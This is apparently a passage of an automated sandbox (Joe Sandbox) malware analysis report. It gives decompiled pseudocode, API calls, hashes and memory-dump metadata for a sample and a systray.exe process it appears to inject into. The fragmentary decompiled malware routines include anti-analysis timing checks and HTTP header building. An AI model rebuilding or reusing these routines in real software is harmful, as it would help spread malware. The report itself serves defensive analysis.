						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x00409a8b
0x00409a93
0x00409a95
0x00409a9a
0x00409a9f
0x00409ab2
0x00409ab7
0x00409ac0
0x00409acc
0x00409adf
0x00409ae4
0x00409ae7
0x00409af0
0x00409b02
0x00409b07
0x00409b0c
0x00000000
0x00000000
0x00409b0e
0x00409b12
0x00000000
0x00000000
0x00409b14
0x00000000
0x00409b12
0x00409b16
0x00409b19
0x00409b1f
0x00409b21
0x00409b2c
0x00409b31
0x00409b34
0x00409b41
0x00409b4c
0x00409b4e
0x00409b54
0x00409b58
0x00409b5b
0x00409b5b
0x00409b62
0x00409b65
0x00409b6a
0x00409b77
0x00409aa6
0x00409aa6
0x00409aa6

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction ID: 31b1220a7bfbfd16f43a3644c83f2c17606f0388dd956b3420c92d1797c928f5
Opcode Fuzzy Hash: ea422489a25dcefea3ed0f1b9a3fefea2ebcd7ffde6029fed25eb79b3bdcb825
Instruction Fuzzy Hash: 202137B2D4020857CB25DA64AD42AEF73BCAB54304F04007FE949A7182F63CBE49CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A020, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0041A020(intOrPtr _a4, void* _a8, long _a12, char _a16) {
				void* _t10;
				void* _t15;

				E0041A950(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t4 =  &_a16; // 0x414c6f
				_t10 = RtlAllocateHeap(_a8, _a12,  *_t4); // executed
				return _t10;
			}

0x0041a037
0x0041a03c
0x0041a04d
0x0041a051

APIs

RtlAllocateHeap.NTDLL(004144F6,?,oLA,00414C6F,?,004144F6,?,?,?,?,?,00000000,00409CC3,?), ref: 0041A04D

Strings

oLA, xrefs: 0041A03C, 0041A048

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID: oLA
API String ID: 1279760036-3789366272
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 3e9cccf5f91448adbf19cee7c08a6922c38dacc77a606dc9f5f43a2a80c29887
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 4BE012B1210208ABDB14EF99CC41EA777ACAF88664F118559BA185B242C630F9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A053, Relevance: 3.0, APIs: 2, Instructions: 39
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E0041A053(void* __eax, void* _a4, void* _a8, void* _a12, void* _a16) {
				void* _t9;
				void* _t22;

				_t9 = __eax - 0xed;
				asm("movsb");
				_t22 = 0x7972fe8e;
				if (_t9 >= 0) goto L3;
			}

0x0041a05a
0x0041a05d
0x0041a05e
0x0041a05f

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D
ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: ExitFreeHeapProcess
String ID:
API String ID: 1180424539-0
Opcode ID: 11917fab4fc43921eec95f1069d53ad3f73a96dd30ef1e4a3b7b1da0b3fac0a9
Instruction ID: 5ea12d3d7ae05d02351dd75cce1dae7829b8283272bce016a2f80bc7f8928f1a
Opcode Fuzzy Hash: 11917fab4fc43921eec95f1069d53ad3f73a96dd30ef1e4a3b7b1da0b3fac0a9
Instruction Fuzzy Hash: 40F090B52412046FCB10EF69CC46DD73B68AF88320F118546FD585B202D534E9108AE1

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACB3, Relevance: 1.6, APIs: 1, Instructions: 66
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E0040ACB3(signed int __eax, void* __ebx, void* __edi, signed int* __esi) {
				signed int _t14;
				void* _t34;
				void* _t35;

				_t14 = __eax;
				_pop(_t34);
				 *__esi =  *__esi ^ __eax;
				_t35 = _t34 - __esi;
				asm("loope 0xffffffc1");
				if (_t35 != 0) goto L7;
				_push(_t35);
			}

0x0040acb3
0x0040acb3
0x0040acb4
0x0040acb8
0x0040acba
0x0040acbe
0x0040acc0

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 58a65aae0d3f289b1bbd7ac078db50ae86a016efc8347129f58172f459a08c14
Instruction ID: 873a8f76f2d29d348879932b9a093644ce9f57f27a4cbe62eee9e29094cdf00a
Opcode Fuzzy Hash: 58a65aae0d3f289b1bbd7ac078db50ae86a016efc8347129f58172f459a08c14
Instruction Fuzzy Hash: 38119E71D0824E5BDF10DB64D885EFDB760CF5130CF0441BBE8489B282F5369A68C792

Uniqueness

Uniqueness Score: -1.00%

Function 004082EB, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004082EB(signed int __ebx, intOrPtr _a4, long _a8, signed int _a1428591184) {
				char _v67;
				char _v68;
				void* _t13;
				int _t14;
				long _t23;
				int _t28;
				void* _t31;
				void* _t33;
				signed int _t38;

				_t38 = __ebx ^ _a1428591184;
				_t31 = _t33;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t13 = E0040ACC0(_t38, _a4 + 0x1c,  &_v68); // executed
				_t14 = E00414E10(_a4 + 0x1c, _t13, 0, 0, 0xc4e7b6d6);
				_t28 = _t14;
				if(_t28 != 0) {
					_t23 = _a8;
					_t14 = PostThreadMessageW(_t23, 0x111, 0, 0); // executed
					_t40 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t28(_t23, 0x8003, _t31 + (E0040A450(_t40, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
				}
				return _t14;
			}

0x004082eb
0x004082f1
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: a9fc290c29bf84a016449771152ec9931a0f336dd95c61853869ad90a24f9c69
Instruction ID: 6f6dfd0860d2890883de8b373fa96d9a633080fd181d1b67f37113765a9f12d7
Opcode Fuzzy Hash: a9fc290c29bf84a016449771152ec9931a0f336dd95c61853869ad90a24f9c69
Instruction Fuzzy Hash: 0F018831A803187BE720A6959C43FFE772CAB44F54F05411DFF04BA1C1D6A9691547EA

Uniqueness

Uniqueness Score: -1.00%

Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E004082F0(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041B850( &_v67, 0, 0x3f);
				E0041C3F0( &_v68, 3);
				_t12 = E0040ACC0(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00414E10(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x004082f0
0x004082ff
0x00408303
0x0040830e
0x0040831e
0x0040832e
0x00408333
0x0040833a
0x0040833d
0x0040834a
0x0040834c
0x0040834e
0x0040836b
0x0040836b
0x00000000
0x0040836d
0x00408372

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction ID: 7ca1aeaa7978e6d3a4d0f1b4208387e2518013786dff53ee4b69e84d93d23419
Opcode Fuzzy Hash: 195adcb3c98d531bb162281db2f5ccaf52fb57ebc6795e714fc563aee22d5922
Instruction Fuzzy Hash: 7301AC31A803187BE720A6959C43FFF775C6B40F54F05411DFF04BA1C1D6A9691546FA

Uniqueness

Uniqueness Score: -1.00%

Function 0041A092, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: e57453cf42302fee41d71815bc8efede598c488529efcc1ef5db9efa3697fb6d
Instruction ID: 3ac7f5d90a89cd7c08052cccbdc28377211d9e3233a7c6bd57628d6426764934
Opcode Fuzzy Hash: e57453cf42302fee41d71815bc8efede598c488529efcc1ef5db9efa3697fb6d
Instruction Fuzzy Hash: 79F03CB2200119BFD714DF98DC85EEB77A9EF8C350F118659B95CD7240C631E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1B7, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 2fe101ceb2bd20289e9375ff34945cdde80d80cfb22abbd05dd79c4f34f2382f
Instruction ID: 30618e31729559e35991ea5726809432e51f465b93bdbf9e075aa4380b6b0ae9
Opcode Fuzzy Hash: 2fe101ceb2bd20289e9375ff34945cdde80d80cfb22abbd05dd79c4f34f2382f
Instruction Fuzzy Hash: 1AF0AFB52042046FDB10EF6ADC81DD73B68EF84264F10855AFD9857202C534E861C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A08D

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 52797000195eaed384c72aa9dcce9225c0ea881c405841437723114bb70c3a82
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: AEE012B1210208ABDB18EF99CC49EA777ACAF88760F018559BA185B242C630E9108AB0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1C0, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041A1C0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				_t3 = _a4 + 0xc8c; // 0xc8c
				E0041A950(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041a1d2
0x0041a1da
0x0041a1f0
0x0041a1f4

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A1F0

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 2f72ad50c13f3bcf2c9af244d49b542148f264c451808f1d297bb805e18cb808
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: CDE01AB12002086BDB10DF49CC85EE737ADAF88650F018555BA0C57241C934E8508BF5

Uniqueness

Uniqueness Score: -1.00%

Function 0041A0A0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0C8

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 12fe1e20a4fde289fa2c932464272cdbd0b6c77391ac3b13e7111125b87f0676
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 14D012716102147BD620DB99CC85FD7779CDF48760F018465BA5C5B241C531BA1086E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00416C6A, Relevance: 7.6, Strings: 6, Instructions: 90
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E00416C6A(signed int __eax, void* __ebx, void* __ecx, void* __edx, void* __esi) {
				signed int _t29;
				void* _t46;
				void* _t56;
				void* _t64;
				signed int _t67;

				_t64 = __esi;
				_t56 = __edx;
				_t46 = __ebx;
				_t29 = __eax;
				_pop(ss);
				_t67 =  *(__ecx - 0x41d8f774) * 0x7d;
				while((_t29 & 0xbe27088c) < 0) {
					_t56 = _t56 +  *((intOrPtr*)(_t67 - 0xc8c2020));
				}
				_pop(ds);
				asm("int3");
				_push(_t56);
				_push(0xbf);
				 *[es:esi] = cs;
				return 0x6a;
			}

0x00416c6a
0x00416c6a
0x00416c6a
0x00416c6a
0x00416c6a
0x00416c6b
0x00416c6c
0x00416c73
0x00416c73
0x00416c8c
0x00416c8d
0x00416c90
0x00416c93
0x00416c96
0x00416ca3

Strings

: , xrefs: 00416D39
Unknown, xrefs: 00416CF5, 00416CF8
: , xrefs: 00416D6D, 00416D71
Host: , xrefs: 00416D6A, 00416D82, 00416D70
Host, xrefs: 00416D32
, xrefs: 00416D5B, 00416D5E

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID:
String ID: $: $: $Host$Host: $Unknown
API String ID: 0-3527920956
Opcode ID: 5ac0276e0a573ea21358f1acf84f707b058c080f7d0181f0e81d9d4b7d302fd6
Instruction ID: b93b48c4ea2cbb05e33f7cd82803dd3b63bb1d8fa079e8a43c5d9f8e05f05982
Opcode Fuzzy Hash: 5ac0276e0a573ea21358f1acf84f707b058c080f7d0181f0e81d9d4b7d302fd6
Instruction Fuzzy Hash: F6213476900308AADB11DA85CC81BEBB3B8EF88308F00955FF9599B285D379A54187E9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E42F, Relevance: 1.3, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E0040E42F(void* __eax, void* __edx, void* __esi) {
				void* _t14;

				asm("cmpsd");
				 *(_t14 + 0x11) =  *(_t14 + 0x11) >> 0x65;
				asm("sbb [ecx-0x2d], edi");
				asm("sbb eax, 0xc9172a64");
				return __esi;
			}

0x0040e431
0x0040e432
0x0040e43a
0x0040e43d
0x0040e450

Strings

e, xrefs: 0040E432

Memory Dump Source

Source File: 00000003.00000002.280873290.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ox87DNNM8d.jbxd

Yara matches

Similarity

API ID:
String ID: e
API String ID: 0-4024072794
Opcode ID: 1f9556c4e73d5fe6cc2529f85b540bddcc740cfbcfc4327359c8732a2dfc4ae2
Instruction ID: 0407faf0a63912aadcd30bb6a4b9a4ebbd8a79f51aec037948bea230879abee2
Opcode Fuzzy Hash: 1f9556c4e73d5fe6cc2529f85b540bddcc740cfbcfc4327359c8732a2dfc4ae2
Instruction Fuzzy Hash: 5DD0A711645A554686204D686C062F8E3B14AC7D35F04529ADD08A7CD04603C06642D9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: systray.exe PID: 6544 Parent PID: 3472 systray.exeCOMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	2.1%
Signature Coverage:	0%
Total number of Nodes:	580
Total number of Limit Nodes:	67

Executed Functions

Function 00189D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00184B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00184B77,007A002E,00000000,00000060,00000000,00000000), ref: 00189D9D

Strings

.z`, xrefs: 00189D8D, 00189D98

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: 400ee49e061f3e91114ef1ea71e821feceb8fa1d92fa44e95e429e03301dda77
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: F9F0BDB2204208AFCB08DF88DC95EEB77ADAF8C754F158248FA1D97241C630E8118BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00189D4B, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00184B77,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00184B77,007A002E,00000000,00000060,00000000,00000000), ref: 00189D9D

Strings

.z`, xrefs: 00189D8D, 00189D98

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: a36ec6ebf072920e7321eb393a327257d83141a0fc1e8420568cdd4083f1b552
Instruction ID: 4ec3a4c266afdca09fe6036cb3a367d11a953e58d8d99c4a56398c4378625123
Opcode Fuzzy Hash: a36ec6ebf072920e7321eb393a327257d83141a0fc1e8420568cdd4083f1b552
Instruction Fuzzy Hash: 0101FDB2200108AFCB18DF88CC85EEB77A9AF8C314F118648FA5CD3240C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00189DFC, Relevance: 1.5, APIs: 1, Instructions: 38filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00184D32,5EB6522D,FFFFFFFF,001849F1,?,?,00184D32,?,001849F1,FFFFFFFF,5EB6522D,00184D32,?,00000000), ref: 00189E45

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a14a048e923c7aaaef428357be4a6e35befcf2638d540087ad39aa86b4f4e9c0
Instruction ID: 109d5328e3c5e823b31f18e1e900c2451aac46b4ec9896a971ff87808a12e80d
Opcode Fuzzy Hash: a14a048e923c7aaaef428357be4a6e35befcf2638d540087ad39aa86b4f4e9c0
Instruction Fuzzy Hash: E3F0E2B2200108AFDB04DF88CC81EEB77A9AF8C314F028248BE1DA7241D634E9518BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00189E00, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00184D32,5EB6522D,FFFFFFFF,001849F1,?,?,00184D32,?,001849F1,FFFFFFFF,5EB6522D,00184D32,?,00000000), ref: 00189E45

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: 70a6e9ecda56bfa331cc1000ea3f7f55c8c2df6f4d9065fe44f64b3b7c0e205f
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 6FF0A4B2200208AFDB14DF89DC91EEB77ADAF8C754F158249BA5D97241D630E9118BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00189F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00172D11,00002000,00003000,00000004), ref: 00189F69

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 6223abea82a3792e9c815d57470feb63d0201921d3912ca781493797ed45c7f5
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: 9BF015B2200208AFDB14DF89CC81EAB77ADAF88754F118149FE5897241C630F910CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00189E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00184D10,?,?,00184D10,00000000,FFFFFFFF), ref: 00189EA5

Memory Dump Source

Source File: 00000008.00000002.492525761.0000000000170000.00000040.00000001.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_170000_systray.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 2743829f9a93b1ca70a13c3617a446d3ab12ea0a826f83735eee8ec81e971298
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 10D01275600214ABD710EB98CC45E97775CEF44750F154495BA5C5B242C530F60087E0

Uniqueness

Uniqueness Score: -1.00%

Function 045D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D984A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 84cd4390444f7e2c43e508dbcd21536c60a1fde9844c702e8c4237ee5cf8a9f3
Instruction ID: 05d1d622df122ded301f0422bde7743a741cec348a5f3bc70fa601fe59493770
Opcode Fuzzy Hash: 84cd4390444f7e2c43e508dbcd21536c60a1fde9844c702e8c4237ee5cf8a9f3
Instruction Fuzzy Hash: 1B900261282042527549B15B44045274056B7E02C5791C012A5445950C8566E85AF661

Uniqueness

Uniqueness Score: -1.00%

Function 045D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D986A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4570000_systray.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 890609f59c811cd6176f010b274039afcac1480fdd9514e7bb1fc5f38bda271c
Instruction ID: 2fdb3c6728dde8cb053a1daa679be4ebeccf2be6e18ecd0dfa58cd60245a1c29
Opcode Fuzzy Hash: 890609f59c811cd6176f010b274039afcac1480fdd9514e7bb1fc5f38bda271c
Instruction Fuzzy Hash: E590027124100513F115615B45047270059A7D02C5F91C412A4455558D9696D956B161

Uniqueness

Uniqueness Score: -1.00%

Function 045D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 045D954A

Memory Dump Source

Source File: 00000008.00000002.495885470.0000000004570000.00000040.00000001.sdmp, Offset: 04570000, based on PE: true

Associated: 00000008.00000002.496238738.000000000468B000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.496258009.000000000468F000.00000040.00000001.sdmp Download File

